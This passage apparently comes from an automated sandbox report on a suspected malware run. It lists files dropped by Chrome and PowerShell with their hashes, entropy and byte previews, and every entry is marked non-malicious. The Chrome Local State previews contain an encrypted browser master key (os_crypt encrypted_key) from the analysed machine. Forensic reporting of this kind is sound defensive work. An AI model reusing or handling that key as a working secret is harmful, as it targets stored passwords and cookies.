                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"91.0.4472.77"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.629166233160556e+12,"network":1.629133834e+12,"ticks":7317648369.0,"uncertainty":3792367.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABBQ7WxpM2gT7fMNkY5iRxkAAAAAAIAAAAAABBmAAAAAQAAIAAAALDWDwoLRYqp0NkiPsTxUN2QcOPsitaJrdacpo+ULE2PAAAAAA6AAAAAAgAAIAAAAOIeKQBWbQSCqXv1OSNS2lIZGHfAdJRwvbkapN4/FWvwMAAAAPz8I/w07KQb4Ut8ObsBGVgFwbuU88R362cCGZpNEtOEILJDMaKWOA4Y9ejBRTt5kEAAAADq8RkIezfgqGPgEaEMkhoGd9qhyBeyucXcRUPEI7mgYIxaDt8C5FJrjkEhV5EOUcUmR2SCzqYelImLnfOlbhRQ"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13267638417137193"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache1. (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):111472
                                                                                                                                                                Entropy (8bit):3.762200965870132
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:4hnDwMoWkNJRGhYyY4MvX9ip/y6pJe3u0H4E5QASmzTColkGSKwXsuR9AjXc2CyK:6mYGuJGL/Elve2dUwhxKEyVTa
                                                                                                                                                                MD5:E7302C0B7B18E9DA2D02197EDCFB2BD1
                                                                                                                                                                SHA1:A8080458659A5D53222A36F461782A19D7C81A69
                                                                                                                                                                SHA-256:1311E2A03F008B53DE6B2E311F4B39A6AA3FE1C7C0A97D0DE0622E3A0A3A68A6
                                                                                                                                                                SHA-512:471E74DA76D33C77D4A7E735FD4105F9CF61607F37BE4CA179BEC9FDD9692EBBBB3C575BC46A1FA47B8B8BF9D1C94B1B86A4D9AA2D31FD46BAFCD511D1F22891
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: l...............T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.......puA...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.m.i.c.r.o.s.o.f.t. .o.n.e.d.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.......f.i.l.e.s.y.n.c.s.h.e.l.l.6.4...d.l.l.......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e."...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.....2.1...0.8.3...0.4.2.5...0.0.0.3.....T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....B8. ...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.7.-.Z.i.p.\.7.-.z.i.p...d.l.l.......n\....%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.7.-.z.i.p.\.......7.-.z.i.p...d.l.l.......7.-.Z.i.p.......7.-.Z.i.p. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.......1.9...0.0................B8.....
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache\b (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):103220
                                                                                                                                                                Entropy (8bit):3.7617699118143513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:whnDwMoWkNJRVYnvX9ip/y6pJe3u0hE5QASmNColkGSfHR9AjV2CWKwFyxXPvklY:QYG8EGL/Elve2ahxKeyVTm
                                                                                                                                                                MD5:EEEC6F847466324F8C09F44A6EAFF319
                                                                                                                                                                SHA1:643D2BBA0448068785F58988968D5C4F5C9B76CD
                                                                                                                                                                SHA-256:2A1D20317DDA0D20C7FDA014AAE308F409EDC8E0CFF1DC6B2DE1DFB209EB4AB7
                                                                                                                                                                SHA-512:324CA95F02454A3692F6EA3454822B97CE260C0B56C6E9A1077DAA8DF7ACD90EFC3BEBB42E5DEF5350BD19F62B4421792CB77D3E4B65DF9A2C49ECEB45014852
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 0...............T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.......puA...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.m.i.c.r.o.s.o.f.t. .o.n.e.d.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.......f.i.l.e.s.y.n.c.s.h.e.l.l.6.4...d.l.l.......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e."...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.....2.1...0.8.3...0.4.2.5...0.0.0.3.....T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....B8. ...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.7.-.Z.i.p.\.7.-.z.i.p...d.l.l.......n\....%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.7.-.z.i.p.\.......7.-.z.i.p...d.l.l.......7.-.Z.i.p.......7.-.Z.i.p. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.......1.9...0.0................B8.....
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cachel (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):110732
                                                                                                                                                                Entropy (8bit):3.7624853019517377
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OhnDwMoWkNJRGhYyY4MvX9ip/y6pJe3u0H4E5QASmzTColkGSKwXsuR9AjXc2CWT:0mYGuEGL/Elve2dUwhxKEyVTK
                                                                                                                                                                MD5:7171A19C7D99F78A95AC278D2403AD29
                                                                                                                                                                SHA1:35EB15DEA17948C329567382A136B3D6BC78453E
                                                                                                                                                                SHA-256:15050949C383DF14BFDA93135CA3CA1CE0B1CA96F113DF5F85F613B8105F49CE
                                                                                                                                                                SHA-512:2727DA95ADA8E29E6EACB571D7A444F84C94F9767632D2ECDB43786A4C4E3C1C22A167F6D0F8702F792D143B366B43F903D0B20280D2D274E990128C0E04763E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ................T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.......puA...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.m.i.c.r.o.s.o.f.t. .o.n.e.d.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.......f.i.l.e.s.y.n.c.s.h.e.l.l.6.4...d.l.l.......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e."...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.....2.1...0.8.3...0.4.2.5...0.0.0.3.....T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....B8. ...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.7.-.Z.i.p.\.7.-.z.i.p...d.l.l.......n\....%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.7.-.z.i.p.\.......7.-.z.i.p...d.l.l.......7.-.Z.i.p.......7.-.Z.i.p. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.......1.9...0.0................B8.....
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.5490452575616273
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TL6ErbXaFpEO5bNmISHnCWm06UwcQ5n5fB:TOErLOpEO5J/Knvm7U1QpB
                                                                                                                                                                MD5:7F20CE947282339C895303C49B3DFE93
                                                                                                                                                                SHA1:6FFC90A15813599BD8A24366AE9305130C965E0D
                                                                                                                                                                SHA-256:88EEA6964B1637FD157CE8E85A26DE0A96849F112809C0705F6CACE0F1B34706
                                                                                                                                                                SHA-512:358CC24210BC4DB01C9A8E11264206943094B4AB2F79A851F97A4BC4BCB72C053BE727A54B20F58BE9E185DE35C5DDAA4CD02C079FD95716EE602CE0FB4FA183
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\a1f93e98-593c-4e9c-9f43-604a206dcbc1.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):77887
                                                                                                                                                                Entropy (8bit):6.0770047727207945
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:RFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:nQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:6CA853231667126C20A0DE78DBC4C67F
                                                                                                                                                                SHA1:CF571115A71A80F94BDA7775C2ABD11D3E1A515D
                                                                                                                                                                SHA-256:9901AB8F03221164C3DECFFF8CEDFBD56F4CF340F089A41DDD5E648630920407
                                                                                                                                                                SHA-512:3DA37F30598C8FC99D6047955BC926F0BE32E64A4B49B8A0797260617E338D9623BE622CCCA1DD62215750A04A4FC074A26984849D8FBAA1274B85C684E3A593
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"91.0.4472.77"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.629166233160556e+12,"network":1.629133834e+12,"ticks":7317648369.0,"uncertainty":3792367.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABBQ7WxpM2gT7fMNkY5iRxkAAAAAAIAAAAAABBmAAAAAQAAIAAAALDWDwoLRYqp0NkiPsTxUN2QcOPsitaJrdacpo+ULE2PAAAAAA6AAAAAAgAAIAAAAOIeKQBWbQSCqXv1OSNS2lIZGHfAdJRwvbkapN4/FWvwMAAAAPz8I/w07KQb4Ut8ObsBGVgFwbuU88R362cCGZpNEtOEILJDMaKWOA4Y9ejBRTt5kEAAAADq8RkIezfgqGPgEaEMkhoGd9qhyBeyucXcRUPEI7mgYIxaDt8C5FJrjkEhV5EOUcUmR2SCzqYelImLnfOlbhRQ"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13267638417137193"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\c08e7180-08d9-4f49-9739-4eb937866196.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):73534
                                                                                                                                                                Entropy (8bit):6.04489331617895
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:ZFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:vQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:16476B7C8F42F63A1B939BA059829C0F
                                                                                                                                                                SHA1:1E84623FDA194E622A8066C7FC08ECAC08B55297
                                                                                                                                                                SHA-256:3DD82D4326560DA3FB63A67541B6CCE7AF598DDD1B32DA1AF5D3A47E96FCCAFF
                                                                                                                                                                SHA-512:F5E8CB9F2F20B248F293FF40FF700C2EEF33D8A5F674B7575DA0D63467A5E486A106B28FF2A52EF1AC31D7689C261407305445A6F8CBCDD2CAF03061037F1DE4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"91.0.4472.77"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.629166233160556e+12,"network":1.629133834e+12,"ticks":7317648369.0,"uncertainty":3792367.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABBQ7WxpM2gT7fMNkY5iRxkAAAAAAIAAAAAABBmAAAAAQAAIAAAALDWDwoLRYqp0NkiPsTxUN2QcOPsitaJrdacpo+ULE2PAAAAAA6AAAAAAgAAIAAAAOIeKQBWbQSCqXv1OSNS2lIZGHfAdJRwvbkapN4/FWvwMAAAAPz8I/w07KQb4Ut8ObsBGVgFwbuU88R362cCGZpNEtOEILJDMaKWOA4Y9ejBRTt5kEAAAADq8RkIezfgqGPgEaEMkhoGd9qhyBeyucXcRUPEI7mgYIxaDt8C5FJrjkEhV5EOUcUmR2SCzqYelImLnfOlbhRQ"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13267638417137193"},"policy":{"last_statistics_update":"13273639829889
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):64
                                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:NlllulLGc:NllUy
                                                                                                                                                                MD5:5B19D97A5677948B3FDFFA587656E174
                                                                                                                                                                SHA1:F2D77C0FB4AF946A6B4F258B86BD7ABF1937DC95
                                                                                                                                                                SHA-256:FE8C19E63973FC5815EBE0E7FB59FD81A19FB0F95A8F434D26D161687EB566F4
                                                                                                                                                                SHA-512:2FF4CA647E1F4AF9B1CB9A4A92E31821B3C38591B324179531EE1C54AE9B63E0C86F4AC09435E2150591167E3DCD371566F0644EAD7E5438868C2A2224C20F27
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: @...e.................................Z#.............@..........
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\29bbe3ee-88b3-44fb-8b00-5f220d470282.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):109782
                                                                                                                                                                Entropy (8bit):7.997374148911505
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:mK4nR4F2dvWPykEr2a4pe2N+OCEYmtKjog6G3cqu9k:r4R9x4peYFCEHo735uk
                                                                                                                                                                MD5:CEF2A4964673E37281DA19C4FF2E6FC5
                                                                                                                                                                SHA1:57AFACC58857D37DC70908AE22C9A2F2EE74A701
                                                                                                                                                                SHA-256:7CFE8628CC9748A79692F797F893F5CF7F523DF57E06E5089F42886DF2ADED60
                                                                                                                                                                SHA-512:1BDC703B4E129ADC743823088D86EBA11970A45378D472252F0EFA2A08FB31E373E936B3ECB213F98469CC192C9CD0D11AB6BF922C5DB565D551A328637BC8BC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ...........Zms.6..._.tnj.Q.K..}j..i...n3s..."!..E..)U.... HQN.&.'.I........F.L/7e6.W.?....+q6/."....4.8.sA..(.Q.J...h$~6J...F.e.D.S%..L.TY.TL6B.o...j.+.g.*`Y5..Hd!&.)Mu]."+../...t.\L.\.......q$..O.......&...........*T)+`;.=....!.Hd.<.......R%..A..b.&.:OaX.@.65....t!........(cd..."..]..uZ.0k]..PH.L(PV.....u...._.TB.).:.H-.,A.o....f.Ue...]. ..5`.C.b.q.C..g....$..H..b...d.%<.w..+..>.....\.[..a<......{.^a.2:.+4.<p[.....'.U..J.T...*...B..S.....X..b...(.............P.'....S*U......9hA....Rr.d).,Y.;..^n.X<m.>+UU.._ NE..V......=....h ..........l=...,e..E.2.Kp.R.X...~.d9Sd'.l)K..w......l....p.zCj9.;8.-R.m .zA....hM.h.+Y..B/..I=.. .....e...!...!.a..\......Y.....P..... ....u.].^^...[..l..b...8..u"..<..p...%kIn..Fu...n..:.<..27.].......Mf..\C..0..!v.D......]...8*..[....,.....1x5h=...}g..o.'.G[.t.a!. t..2.U'......"..^".`n.r...Zn.'..5..(E.eBO.....Y.nER.....z.~c..D.KL....8I......6.E.`t....^U...R..oq.;0.[h..W.Mu.E%G.GlR|..H..P..AM@.BN]B..d..Y
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4e472fc3-9f95-4aec-b2dd-a79a88941aaf.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):30948
                                                                                                                                                                Entropy (8bit):7.99105089802474
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:768:jElAfPryn5QzShaPuChbhFbHRu/llKGr7J9FwyIlWg+S3:jElAfzyneSMPuKbvzUllKGzFDOWgv
                                                                                                                                                                MD5:7F0FCE2F184F63FED8E9929FB106C282
                                                                                                                                                                SHA1:0582EB5BFC7FCCCC1C77A860F00E351E61F5DC67
                                                                                                                                                                SHA-256:7C33F333216849E50AFC9550DA7DA4450D221B837340716ACCEE3766FFD4A62B
                                                                                                                                                                SHA-512:AD1CD5B804C08C4C25BD6F97153D3371156848A83682DF1829B0B113B60ED0B01D67B5CD737CB414C8B825E12C7E0D6B5F9B338F4AF7FC82BE8AAF4CA8E279BA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ............y..../...*D4e.sH.v.{......mv9MR...&..b.`.P."........r.....X...9s.s..w..;...>.}8...O.ep....O.]...$KO.tu...2?Yfi.'ove..T.....(.N7.R..<yr....t..})......>[......*."......'7.j......#.n..e1..Fr...........j5xH.~.*...yvw....y.....vI......IWT..)...|...\..<=.V.C..}.fF..T.....~.~..:).....i...2./D.}...]..<+3T..Z.Q9*0.......3..7.e..p.:..-.P..n.}j....U...."...|Gm...AdQ:*...gz%n..:...K.o[...".n...(V..A...U.D.~x.Q..X.tw.F..,.Q...k.9.w.......2....t......XF....E./...Hu.%..].....7.T...X.\$4.~.....`..e\....}.X...`A...J.....k...$IO..OS:...=...R...q......FE.H.)M..WX/........6.._..ry..J..`.q.'....x^..[r..Z.Y:..0...g.y....#.1.'...F7M.6...S....7.To.G.... `#.......-."...^....;..8..{.6VhL?%uU...K....O9.`Y....b.5.,zP.+\..!.1wK.j.P].....jW.!.j...i3.v.<..n.P..g....~.x..z.8...2^..U.f.bt#.+.U..N......!.[.!#.C.A.xy.....p...n.mU,.....=.......h .ME..T/....lT\h,.U..........(.U ...Tf.?Zd8.2.V......*..../....Oyh.j.._.I.k..u...).3.r.3...j......O....+],...
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5004a1ee-4037-4bb8-8420-714886724c59.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):101891
                                                                                                                                                                Entropy (8bit):7.9971613680976565
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:Xs4McBbhITdJs7qJdKpJcKdNd+HyEzEcl6dr:X7Bb4dJsOPKpJrv4tTl6dr
                                                                                                                                                                MD5:173CA02E5B06065771DEB2F28E4E5A9E
                                                                                                                                                                SHA1:20F1774FB280C94C13082A255C27D7A786EFD5C7
                                                                                                                                                                SHA-256:634557AE2916F2FAA0CBF2557F8F96E26845ABE94D2784FD73B169EC5618B186
                                                                                                                                                                SHA-512:D947E3ED56BE1F3C668943E8F066F39650D2E0D76BF64BAD167E100B8B1066B88D8E851346AFBD9777E90445F41C5108A0A2F1514A3F28F02D4EC39978121E71
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ............{..0......&xqH.....zyIBv9....=...+......I6....3#.l.@..9.s].W7...h4..H...7.^.........Bg.....`.;.S...P.............z.3.........9~.P..{..-.z........b.:......>..'....I8.......'v.M'E.?bA...N8.'.8I.._...<v&.pT{.L'Ne...#.S!].T.-+...r)5.j.U.8q....X..VPo.....F.o..A.~~.?.w......eNJ..a)....i....:?._^..v.<=ei...i.......Q...8k......~j.c.W......~...Q.yq..^9..z.......S..b.E..L3|.9S.pa...a....5...J.\.2l..s..4.....S.u..o.|.Q.K.0.=........0....xj.4....Mie..C..3..... ..........WN........4Vs.B..N.bD...VK%...mb...{{....pd..7..G.....}.J;"..4,.......A.R|0d..)..M......;;.8.h.C.u..pkM..Z@.......r..U....H...],..l:~p..8`....3....5.*.t../S{.{`.^kB=f......ZR..L.$t..D%I..xB../.{rb..h8.!.........Z.0........{PuK%Vv...RR.*.......j.vw.[B..$..|&..eZEW.Z[&..d>.o......@..t.z.O.12C......Kk..oS.[.0.M...<.zq#*g.r......"0+.[.....Tb.E....F...U..U0...G.........t!.+...&K.@.N.#R.]...+.;.M[..x,...J.l........&y.n.....j>..0.|W.+.S.0X.S.E..L....R.....W.u.g.S.&^.g..N/..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\SortingLshClusters
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):33872
                                                                                                                                                                Entropy (8bit):2.0569169245781995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:SuvCanrfpcIQPDdn6ZElJghag9exwM7FHjwvZJiSHqLg9wR7e9AncnT5S7QEdZ4h:g1Qhh9eKKLg9wR7aAWZ3h
                                                                                                                                                                MD5:0F63C5027C2425412AFDE4B88D9BDDE8
                                                                                                                                                                SHA1:98457E193D6DD71525AEB3F48CD13B6455C35B9F
                                                                                                                                                                SHA-256:C8232B6128DC4759DB73245BD110589BA2D910DB20FB6367AFB6E6D9E4C1F54B
                                                                                                                                                                SHA-512:9C98F0F257456B542EF0177F513F07440165468DB4B01342A009210554079186FC03E61E0BF92ABED35A51B6578A263197A9061F699EF960CDEE85553D0BCDEE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: #"b####""##########c####""#$#######""""#""#""#############""#""#################$$$$$$$$$$$$########$$$$$$$$$$$$########$##$########""#$##$$######""#$##########""#""#$$####$##$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$cc#ccc"b"b$######ccbbccc"aa"b######""#####""#""###########""#""#"!!""$####""#$##$##$$$$#c##$##$$$$$$####$$$$$$$##$$$$######""#$##$##cc"b#""#"a!#$##$""#####""#""#$##$####""#""#"!!#$####""#$##$$$$$$$$$##$$$$$$$$$$$$$$$##$$$$#c###############c######$##$##""""""""""#""""############""#""#$##########$$$$$d$$$$$$$$########$$$$$$$##$$$$c"b##bb###########c###c#""#$##$##""""""#""#""#########""###"b#""#####$######$$$$$$$##$$$$$$####$$##$$$$##$$$$$$cccc##""bb$######ccbbcccbb"b$##########""#""""##########""#""#"!!""$####""#$######$$$$d##$##$$$$$##$##$$$$$##$$$$$$####c#""#######""#cc"b#"b#"!!""$####""#####""#"!!#######""###""#""#!!!!#$####""#$##$##$$$$$$$$$$$$$$$$$$$$$$$$$$$$#c######$$$###c######$$$########""###$##$######""#$$$##$$$$$$$$$$$##$$$$$$$$$$$$$$$$$$$$##$$##$$$$####$$$$$$##$####$$$$$$$$
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\_metadata\verified_contents.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1765
                                                                                                                                                                Entropy (8bit):6.014705394789547
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:p/henDcwAakDUSy+T5V3uVTuCojVkS4FkZXco:RcDPAa8y+TbpjVyFiMo
                                                                                                                                                                MD5:8B845471B314D55AE06FBF882AB8F776
                                                                                                                                                                SHA1:190ECAEAF30450A3130E775C0B4B92B90F11B24B
                                                                                                                                                                SHA-256:992660E19AE360708B225EEAAE07D9A8BCE2A5AC2CE2822AAEC9A8D9945F0F2D
                                                                                                                                                                SHA-512:2ED7B15600BBC2F5BDF5A55CA589A49C2C33DAD373DFCD17286A6BADF1F2A8457DE516D5770DD68DBA2102875C2D4B839C0E5EEE1B6F673B695E012775C116D5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJTb3J0aW5nTHNoQ2x1c3RlcnMiLCJyb290X2hhc2giOiJWUzhSZkJXN1Y5b1hSMmkySndJUUtPRXNUNUtISUl5dzdDVGNzbkhlX3RzIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6Ik5rQVVqMDZ0dDlZQmhXY1htY0o2akZNQ2xRZHEtUmVYQmVxbTFNVkUxaWMifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJjbWFoaG5waG9sZGlqaGpva29ubWZkamJmbWtscHBpaiIsIml0ZW1fdmVyc2lvbiI6IjEuMC42IiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"XcqF0Bmr71CCZ9EStq6NKbjAraTtAZbHDIbaD5yWBJEQkMYVMxuJwjEMuAxifiAqEPIJ7PTVSja92fVNZxwEAmFjHXMKVs9WL1y0cqggHKaQ3A0cMF75ibR02WUkqgYa2Br8jxaapS7i1cNFY7qRNY__eT_tsKgfQRX7eNHB4RJ_ZuKpAD4wR5i03UhUo9FRvdAnFbv_p-GwEh-yq5iUaqoF5gc9vE1YJcf8somTz1eMJeoU3tXZjYZpxCsMl68hUXlH4sAHWLgKbT0I3zknkwKUWDFdtsBRUyTSoMabDC7_EvCpnQw8Wq1R17YYtUoG7Y1bK1jhQ0-nb7kuElF15qAmmI
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\manifest.fingerprint
